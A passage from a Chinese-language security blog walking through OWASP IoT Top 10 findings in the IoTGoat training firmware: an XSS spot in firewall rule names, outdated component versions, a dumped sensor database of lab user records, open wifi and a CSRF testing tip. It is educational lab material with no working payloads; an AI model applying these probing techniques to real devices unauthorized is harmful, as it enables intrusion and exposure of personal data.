<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><p>Network/Firewall/Traffic Rules里</p>
<p>New forward rule 、 New source NAT 的Name 有XSS</p>
<blockquote>
<p>快速了解：<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/26177815">浅谈XSS攻击的那些事（附常用绕过姿势）</a></p>
</blockquote>
<h2 id="No-4-Lack-of-Secure-Update-Mechanism"><a href="#No-4-Lack-of-Secure-Update-Mechanism" class="headerlink" title="No 4: Lack of Secure Update Mechanism:"></a>No 4: Lack of Secure Update Mechanism:</h2><h3 id="Insecure-package-update-configuration-defaults-including-CVE-2020-7982"><a href="#Insecure-package-update-configuration-defaults-including-CVE-2020-7982" class="headerlink" title="Insecure package update configuration defaults including CVE-2020-7982."></a>Insecure package update configuration defaults including CVE-2020-7982.</h3><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/202039">OPENWRT中的远程命令执行漏洞（CVE-2020-7982）[CN]</a></p>
<h2 id="No-5-Use-of-Insecure-or-Outdated-Components"><a href="#No-5-Use-of-Insecure-or-Outdated-Components" class="headerlink" title="No 5: Use of Insecure or Outdated Components:"></a>No 5: Use of Insecure or Outdated Components:</h2><h3 id="Several-insecure-and-outdated-software-components-with-CVEs-such-as-Dnsmasq-pppd-Linux-Kernel-BusyBox-wpa-supplicant-and-more"><a href="#Several-insecure-and-outdated-software-components-with-CVEs-such-as-Dnsmasq-pppd-Linux-Kernel-BusyBox-wpa-supplicant-and-more" class="headerlink" title="Several insecure and outdated software components with CVEs such as Dnsmasq, pppd, Linux Kernel, BusyBox, wpa_supplicant, and more."></a>Several insecure and outdated software components with CVEs such as Dnsmasq, pppd, Linux Kernel, BusyBox, wpa_supplicant, and more.</h3><p>Todo: auto scan</p>
<p>TLS 1.2</p>
<p>ssh 2.0</p>
<p>pppd 2.4.7</p>
<p>Dnsmasq 2.73</p>
<p>wpa_supplicant v2.7-devel</p>
<p>BusyBox v1.28.4</p>
<h2 id="No-6-Insufficient-Privacy-Protection"><a href="#No-6-Insufficient-Privacy-Protection" class="headerlink" title="No 6: Insufficient Privacy Protection:"></a>No 6: Insufficient Privacy Protection:</h2><h3 id="PII-data-captured-and-stored-insecurely"><a href="#PII-data-captured-and-stored-insecurely" class="headerlink" title="PII data captured and stored insecurely."></a>PII data captured and stored insecurely.</h3><p>Personally identifiable information (PII)</p>
<p>firmwalker搜索的db文件</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs clean">##################################### *.db<br>/usr/lib/lua/luci/controller/iotgoat/sensordata.db<br></code></pre></td></tr></table></figure>

<p>然后使用sqlite3</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">kali</span>@kali:~/Desktop/IoTGoat/_IoTGoat-x<span class="hljs-number">86</span>.img.extracted/squashfs-root/usr/lib/lua/luci/controller/iotgoat$ sqlite<span class="hljs-number">3</span> sensordata.db <br><span class="hljs-attribute">SQLite</span> version <span class="hljs-number">3</span>.<span class="hljs-number">32</span>.<span class="hljs-number">3</span> <span class="hljs-number">2020</span>-<span class="hljs-number">06</span>-<span class="hljs-number">18</span> <span class="hljs-number">14</span>:<span class="hljs-number">00</span>:<span class="hljs-number">33</span><br><span class="hljs-attribute">Enter</span> <span class="hljs-string">&quot;.help&quot;</span> for usage hints.<br><span class="hljs-attribute">sqlite</span>&gt; .dump<br><span class="hljs-attribute">PRAGMA</span> foreign_keys=<span class="hljs-literal">OFF</span>;<br><span class="hljs-attribute">BEGIN</span> TRANSACTION;<br><span class="hljs-attribute">CREATE</span> TABLE sensors(id INTEGER PRIMARY KEY AUTOINCREMENT, temperature NUMERIC, humidity NUMERIC, currentdate DATE, currentime TIME, name TEXT, email TEXT, birthdate NUMERIC);<br><span class="hljs-attribute">INSERT</span> INTO sensors VALUES(<span class="hljs-number">1</span>,<span class="hljs-number">22</span>.<span class="hljs-number">399999999999998579</span>,<span class="hljs-number">68</span>,&#x27;<span class="hljs-number">2020</span>-<span class="hljs-number">03</span>-<span class="hljs-number">24</span>&#x27;,&#x27;<span class="hljs-number">18</span>:<span class="hljs-number">56</span>:<span class="hljs-number">33</span>&#x27;,&#x27;johnsmith&#x27;,&#x27;johnsmith@gmail.com&#x27;,<span class="hljs-number">1311977</span>);<br><span class="hljs-attribute">INSERT</span> INTO sensors VALUES(<span class="hljs-number">2</span>,<span class="hljs-number">29</span>.<span class="hljs-number">699999999999999289</span>,<span class="hljs-number">98</span>,&#x27;<span class="hljs-number">2020</span>-<span class="hljs-number">03</span>-<span class="hljs-number">24</span>&#x27;,&#x27;<span class="hljs-number">18</span>:<span class="hljs-number">56</span>:<span class="hljs-number">43</span>&#x27;,&#x27;jillsmith&#x27;,&#x27;jillsmith@gmail.com&#x27;,<span class="hljs-number">4141979</span>);<br><span class="hljs-attribute">INSERT</span> INTO sensors VALUES(<span class="hljs-number">3</span>,<span class="hljs-number">31</span>.<span class="hljs-number">199999999999999289</span>,<span class="hljs-number">28</span>,&#x27;<span class="hljs-number">2020</span>-<span class="hljs-number">03</span>-<span class="hljs-number">24</span>&#x27;,&#x27;<span class="hljs-number">18</span>:<span class="hljs-number">57</span>:<span class="hljs-number">05</span>&#x27;,&#x27;walter&#x27;,&#x27;waltergary@yopmail.com&#x27;,<span class="hljs-number">32821969</span>);<br><span class="hljs-attribute">INSERT</span> INTO sensors VALUES(<span class="hljs-number">4</span>,<span class="hljs-number">16</span>.<span class="hljs-number">899999999999998578</span>,<span class="hljs-number">38</span>,&#x27;<span class="hljs-number">2020</span>-<span class="hljs-number">03</span>-<span class="hljs-number">24</span>&#x27;,&#x27;<span class="hljs-number">18</span>:<span class="hljs-number">57</span>:<span class="hljs-number">20</span>&#x27;,&#x27;WilliamRonald&#x27;,&#x27;billronald@yopmail.com&#x27;,<span class="hljs-number">11141989</span>);<br><span class="hljs-attribute">INSERT</span> INTO sensors VALUES(<span class="hljs-number">5</span>,<span class="hljs-number">35</span>,<span class="hljs-number">78</span>,&#x27;<span class="hljs-number">2020</span>-<span class="hljs-number">03</span>-<span class="hljs-number">24</span>&#x27;,&#x27;<span class="hljs-number">18</span>:<span class="hljs-number">58</span>:<span class="hljs-number">04</span>&#x27;,&#x27;Test&#x27;,&#x27;TstUser@aol.com&#x27;,<span class="hljs-number">12121990</span>);<br><span class="hljs-attribute">INSERT</span> INTO sensors VALUES(<span class="hljs-number">6</span>,<span class="hljs-number">35</span>,<span class="hljs-number">88</span>,&#x27;<span class="hljs-number">2020</span>-<span class="hljs-number">03</span>-<span class="hljs-number">24</span>&#x27;,&#x27;<span class="hljs-number">18</span>:<span class="hljs-number">58</span>:<span class="hljs-number">18</span>&#x27;,&#x27;Sgt&#x27;,&#x27;sgtmajor@us.gov&#x27;,<span class="hljs-number">10171956</span>);<br><span class="hljs-attribute">DELETE</span> FROM sqlite_sequence;<br><span class="hljs-attribute">INSERT</span> INTO sqlite_sequence VALUES(&#x27;sensors&#x27;,<span class="hljs-number">6</span>);<br><span class="hljs-attribute">COMMIT</span>;<br><span class="hljs-attribute">sqlite</span>&gt; <br><br></code></pre></td></tr></table></figure>

<h2 id="No-7-Insecure-Data-Transfer-and-Storage"><a href="#No-7-Insecure-Data-Transfer-and-Storage" class="headerlink" title="No 7: Insecure Data Transfer and Storage:"></a>No 7: Insecure Data Transfer and Storage:</h2><p><code>&lt;IP&gt;/cgi-bin/luci/admin/network/wireless/wl0.network1</code></p>
<p>wifi没有密码</p>
<h2 id="No-8-Lack-of-Device-Management"><a href="#No-8-Lack-of-Device-Management" class="headerlink" title="No 8: Lack of Device Management:"></a>No 8: Lack of Device Management:</h2><p><code>&lt;IP&gt;/cgi-bin/luci/admin/status/syslog</code>没有开启</p>
<h2 id="No-9-Insecure-Default-Settings"><a href="#No-9-Insecure-Default-Settings" class="headerlink" title="No 9: Insecure Default Settings:"></a>No 9: Insecure Default Settings:</h2><h3 id="Many-included-in-IoTGoat-such-as-missing-secure-headers-to-prevent-framing-as-well-as-CSRF-protections-on-sensitive-requests"><a href="#Many-included-in-IoTGoat-such-as-missing-secure-headers-to-prevent-framing-as-well-as-CSRF-protections-on-sensitive-requests" class="headerlink" title="Many included in IoTGoat such as missing secure headers to prevent framing as well as CSRF protections on sensitive requests."></a>Many included in IoTGoat such as missing secure headers to prevent framing as well as CSRF protections on sensitive requests.</h3><blockquote>
<p>检测CSRF漏洞是一项比较繁琐的工作，最简单的方法就是抓取一个正常请求的数据包，去掉Referer字段后再重新提交，如果该提交还有效，那么基本上可以确定存在CSRF漏洞。</p>
<p>​    目前防御 CSRF 攻击主要有三种策略：验证 HTTP Referer 字段；在请求地址中添加 token 并验证；在 HTTP 头中自定义属性并验证。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/xiaoxinshuaiga/article/details/80766369">link</a></p>
</blockquote>
<h2 id="No-10-Lack-of-Physical-Hardening"><a href="#No-10-Lack-of-Physical-Hardening" class="headerlink" title="No 10: Lack of Physical Hardening:"></a>No 10: Lack of Physical Hardening:</h2><p>物理强化，应该是指对固件的保护</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/12/03/HackTheBox%20Starting%20Point%20Archetype%20.27/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HackTheBox Starting Point Archetype .27</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/19/Netgear%20Nighthawk%20R8300%20upnpd%20PreAuth%20RCE%20%E5%A4%8D%E7%8E%B0%E8%BE%85%E5%8A%A9/">
                        <span class="hidden-mobile">Netgear Nighthawk R8300 upnpd PreAuth RCE 复现辅助</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <script type="text/javascript">
    Fluid.utils.lazyComments('comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'mrbelieve128/mrbelieve128.github.io');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('label', 'utterances');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        浙ICP备19033044号
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
